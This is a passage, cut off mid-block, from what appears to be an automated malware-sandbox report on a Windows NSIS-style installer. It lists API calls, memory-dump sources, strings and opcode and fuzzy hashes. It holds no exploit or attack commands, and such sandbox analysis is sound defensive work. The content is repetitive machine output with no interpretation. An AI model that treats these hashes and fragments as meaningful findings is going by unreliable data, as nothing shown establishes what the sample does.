                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Char$Next$CreateDirectoryPrev
                                        • String ID:
                                        • API String ID: 4115351271-0
                                        • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                        • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                        • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                        • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                        APIs
                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                        • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                        • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                        • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                        • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                        • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                        • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                        APIs
                                        • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                        • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                        • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                        • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                        • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                        • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                        • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                        • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                        • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                        • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                        • DeleteObject.GDI32(?), ref: 00404AA5
                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                        • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                        • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                        • GlobalFree.KERNEL32(?), ref: 00404DD8
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                        • ShowWindow.USER32(?,00000000), ref: 00404F75
                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                        • ShowWindow.USER32(00000000), ref: 00404F87
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $ @$M$N
                                        • API String ID: 1638840714-3479655940
                                        • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                        • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                        • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                        • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                        APIs
                                        • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                        • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                        • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                        • lstrlenW.KERNEL32(?), ref: 00406D58
                                        • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                        • FindClose.KERNEL32(?), ref: 00406E5F
                                        Strings
                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                        • ptF, xrefs: 00406D1A
                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                        • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                        • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                        • \*.*, xrefs: 00406D2F
                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                        • API String ID: 2035342205-1650287579
                                        • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                        • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                        • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                        • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                        APIs
                                        • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                        • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                        • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                        • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                        • SetWindowTextW.USER32(?,?), ref: 004045AF
                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                        • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                        • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                        • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                          • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                          • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                        • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426979,759223A0,00000000), ref: 00406902
                                        • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                        • String ID: F$A
                                        • API String ID: 3347642858-1281894373
                                        • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                        • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                        • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                        • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                        • CloseHandle.KERNEL32(?), ref: 00407212
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                        • API String ID: 1916479912-1189179171
                                        • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                        • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                        • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                        • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                        APIs
                                        • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426979,759223A0,00000000), ref: 00406902
                                        • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                        • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                        • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                        • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00426979,759223A0,00000000), ref: 00406A73
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                        • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 3581403547-1792361021
                                        • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                        • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                        • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                        • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                        APIs
                                        • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                        Strings
                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: CreateInstance
                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                        • API String ID: 542301482-1377821865
                                        • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                        • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                        • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                        • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                        • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                        • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                        • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                        • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                        • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                        • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                        • lstrlenW.KERNEL32(?), ref: 004063F8
                                        • GetVersionExW.KERNEL32(?), ref: 00406456
                                          • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                        • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                        • GlobalFree.KERNEL32(?), ref: 00406509
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
